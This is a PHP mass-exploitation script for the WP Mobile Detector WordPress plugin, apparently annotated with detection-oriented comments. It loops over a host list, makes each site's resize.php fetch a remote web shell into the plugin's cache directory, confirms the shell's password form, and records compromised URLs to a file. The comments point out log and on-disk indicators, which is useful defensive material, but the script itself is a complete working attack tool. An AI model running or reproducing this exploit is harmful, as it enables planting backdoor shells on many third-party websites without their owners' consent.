WP Mobile Detector exploit
<?php
// Script setup. This is a mass-check tool for the WP Mobile Detector WordPress
// plugin: it reads a list of hosts and, per host, calls the plugin's resize.php
// and then looks for a resulting file in the plugin's cache/ directory
// (see the loop at the bottom of the file).
set_time_limit(0);   // no PHP execution-time limit: the loop may run over a long host list
error_reporting(0);  // silence all warnings/notices, e.g. from unreachable hosts
$get_url=file('url.txt');   // one target host per line; lines keep their newline and are trim()ed at use
$shell_url="http://localhost/shell.php";   // value sent as resize.php's "src" parameter; placeholder URL in the gist
function curl($url='', $post='', $referer='', $proxy='')
{
    // Thin cURL wrapper: fetch $url and return the response body as a string
    // (headers stripped), or curl_exec()'s false on failure.
    //   $post    - urlencoded body; when non-empty the request becomes a POST
    //   $referer - Referer header value; when empty the original code passes
    //              the integer 1, which cURL sends as the literal value "1"
    //              (preserved here, behaviour is unchanged)
    //   $proxy   - optional proxy spec handed straight to CURLOPT_PROXY
    //
    // NOTE(review): TLS certificate and hostname verification are both
    // disabled, and the cookie jar is written under DOCUMENT_ROOT, i.e.
    // inside the web root of the machine running this script.
    $handle      = curl_init();
    $cookie_path = $_SERVER['DOCUMENT_ROOT'].'/cookie.txt';

    $options = array(
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_HEADER         => 0,
        CURLOPT_SSL_VERIFYPEER => 0,
        CURLOPT_SSL_VERIFYHOST => 0,
        // Fixed User-Agent string; identical on every request this tool makes,
        // so it is a usable log indicator.
        CURLOPT_USERAGENT      => 'Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.2.15 Version/10.10',
        CURLOPT_COOKIEJAR      => $cookie_path,
        CURLOPT_COOKIEFILE     => $cookie_path,
        CURLOPT_POST           => empty($post) ? 0 : 1,
        CURLOPT_REFERER        => empty($referer) ? 1 : $referer,
    );
    #$options[CURLOPT_ENCODING] = 'gzip, deflate';
    if (!empty($post)) {
        $options[CURLOPT_POSTFIELDS] = $post;
    }
    if (!empty($proxy)) {
        $options[CURLOPT_PROXY] = $proxy;
    }
    curl_setopt_array($handle, $options);

    $body = curl_exec($handle);
    #$body = iconv('cp1251', 'UTF8', $body);
    curl_close($handle);

    return $body;
}
// Main loop: one iteration per line of url.txt. Each entry is treated as a bare
// host name: "http://" is always prepended, so HTTPS-only sites are never
// reached, and the plugin path is appended verbatim.
for($i=0;$i<count($get_url);$i++){
// Step 1: POST "src=<$shell_url>" to the plugin's resize.php. The return value
// is ignored; the script apparently relies on resize.php fetching that URL
// and storing the result under the plugin's cache/ directory (step 2 assumes
// exactly that). Defender view: a POST to
// /wp-content/plugins/wp-mobile-detector/resize.php whose src parameter is an
// external URL is the request to alert on in web-server logs.
curl('http://'.trim($get_url[$i]).'/wp-content/plugins/wp-mobile-detector/resize.php','src='.$shell_url);
// Step 2: request cache/shell.php directly. Plain file_get_contents() is used
// here rather than curl(), so this request carries neither the cookie jar nor
// the custom User-Agent. On an unreachable host this is false (warnings are
// suppressed by error_reporting(0) above). A PHP file inside the plugin's
// cache/ directory is the on-disk indicator for this activity.
$matches=file_get_contents('http://'.trim($get_url[$i]).'/wp-content/plugins/wp-mobile-detector/cache/shell.php');
// Step 3: success is inferred from the response body containing a password
// form field; the capture array $o is never used.
if (preg_match('#input type=password name=pass#', $matches, $o))
{
// Print the hit and append the same line to ./shell.txt; ";pass" is a fixed
// suffix added to every recorded line.
echo $i.':: http://'.trim($get_url[$i])."/wp-content/plugins/wp-mobile-detector/cache/shell.php;pass\n";
file_put_contents('./shell.txt','http://'.trim($get_url[$i])."/wp-content/plugins/wp-mobile-detector/cache/shell.php;pass\n", FILE_APPEND);
}
// Push buffered output immediately so progress is visible while the list runs.
ob_flush();
flush();
}
?>